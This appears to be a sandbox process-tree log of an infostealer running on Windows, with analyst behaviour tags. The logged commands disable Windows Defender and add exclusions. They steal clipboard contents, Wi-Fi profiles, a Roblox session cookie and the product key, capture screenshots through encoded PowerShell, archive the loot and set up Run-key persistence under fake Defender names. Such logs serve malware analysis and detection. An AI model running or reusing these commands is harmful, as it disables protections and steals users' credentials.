        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe'"
        100⤵
        
        PID:4260
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe'
        101⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2492
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        100⤵
        
        PID:3952
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        101⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2336
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Could not open the file', 0, 'Error', 32+16);close()""
        100⤵
        
        PID:684
        
        C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Could not open the file', 0, 'Error', 32+16);close()"
        101⤵
        
        PID:5872
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        100⤵
        
        PID:2436
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        101⤵
        Enumerates processes with tasklist
        
        PID:1588
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        100⤵
        
        PID:2300
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        101⤵
        
        PID:5176
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        100⤵
        
        PID:5476
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
        101⤵
        
        PID:4464
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
        100⤵
        
        PID:2724
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
        101⤵
        
        PID:5272
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        100⤵
        
        PID:5888
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        101⤵
        Detects videocard installed
        
        PID:5428
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        100⤵
        
        PID:4616
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        101⤵
        Detects videocard installed
        
        PID:2072
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        100⤵
        
        PID:1092
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        101⤵
        Enumerates processes with tasklist
        
        PID:3544
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        100⤵
        
        PID:3852
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        101⤵
        Enumerates processes with tasklist
        
        PID:5468
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        100⤵
        
        PID:4848
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        101⤵
        
        PID:4708
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        100⤵
        Clipboard Data
        
        PID:5080
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        101⤵
        Clipboard Data
        
        PID:2300
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        100⤵
        
        PID:3868
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        101⤵
        Enumerates processes with tasklist
        
        PID:1536
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        100⤵
        
        PID:4124
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        101⤵
        
        PID:4420
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        100⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:4952
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        101⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:4948
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        100⤵
        
        PID:4620
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        101⤵
        Gathers system information
        
        PID:3736
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
        100⤵
        
        PID:5632
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
        101⤵
        
        PID:5132
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        100⤵
        
        PID:4476
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        101⤵
        
        PID:4692
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\eboqnksw\eboqnksw.cmdline"
        102⤵
        
        PID:5888
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5087.tmp" "c:\Users\Admin\AppData\Local\Temp\eboqnksw\CSCE2E16EF5A474B27AF78F85EA9185DA6.TMP"
        103⤵
        
        PID:1100
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        100⤵
        
        PID:1368
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        101⤵
        
        PID:720
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
        100⤵
        
        PID:5784
        
        C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        101⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:1964
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        100⤵
        
        PID:3684
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        101⤵
        
        PID:956
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
        100⤵
        
        PID:2856
        
        C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        101⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:2384
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        100⤵
        
        PID:5220
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        101⤵
        
        PID:2152
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        100⤵
        
        PID:5360
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        101⤵
        Enumerates processes with tasklist
        
        PID:5872
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        100⤵
        
        PID:5352
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        101⤵
        
        PID:5400
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        100⤵
        
        PID:5212
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        101⤵
        
        PID:5680
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        100⤵
        
        PID:6044
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        101⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5200
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        100⤵
        
        PID:3316
        
        C:\Windows\system32\getmac.exe
        
        getmac
        101⤵
        
        PID:4996
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        100⤵
        
        PID:5868
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        101⤵
        
        PID:32
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI40882\rar.exe a -r -hp"Aquarius" "C:\Users\Admin\AppData\Local\Temp\wCztR.zip" *"
        100⤵
        
        PID:5368
        
        C:\Users\Admin\AppData\Local\Temp\_MEI40882\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI40882\rar.exe a -r -hp"Aquarius" "C:\Users\Admin\AppData\Local\Temp\wCztR.zip" *
        101⤵
        
        PID:4780
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        100⤵
        
        PID:3160
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        101⤵
        
        PID:1428
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        100⤵
        
        PID:720
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        101⤵
        
        PID:1344
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        100⤵
        
        PID:528
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        101⤵
        
        PID:852
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        100⤵
        
        PID:2972
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        101⤵
        
        PID:2828
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        101⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5272
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        100⤵
        
        PID:1096
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        101⤵
        Detects videocard installed
        
        PID:6100
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        100⤵
        
        PID:3108
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        101⤵
        
        PID:4816
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        98⤵
        
        PID:5468
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        98⤵
        Checks computer location settings
        
        PID:3960
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3FCE.tmp\3FCF.tmp\3FD0.bat C:\Windows\system32\java.exe"
        99⤵
        Drops file in System32 directory
        
        PID:4972
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        100⤵
        Delays execution with timeout.exe
        
        PID:2560
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        100⤵
        
        PID:5336
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        100⤵
        
        PID:6052
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        100⤵
        
        PID:2816
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        100⤵
        
        PID:2216
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        100⤵
        
        PID:5868
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        101⤵
        
        PID:3924
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        100⤵
        
        PID:5276
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        100⤵
        Checks computer location settings
        
        PID:368
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\478E.tmp\478F.tmp\4790.bat C:\Windows\system32\java.exe"
        101⤵
        Drops file in System32 directory
        
        PID:3220
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        102⤵
        Delays execution with timeout.exe
        
        PID:1768
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        102⤵
        
        PID:3204
        
        C:\Windows\system32\reg.exe
        
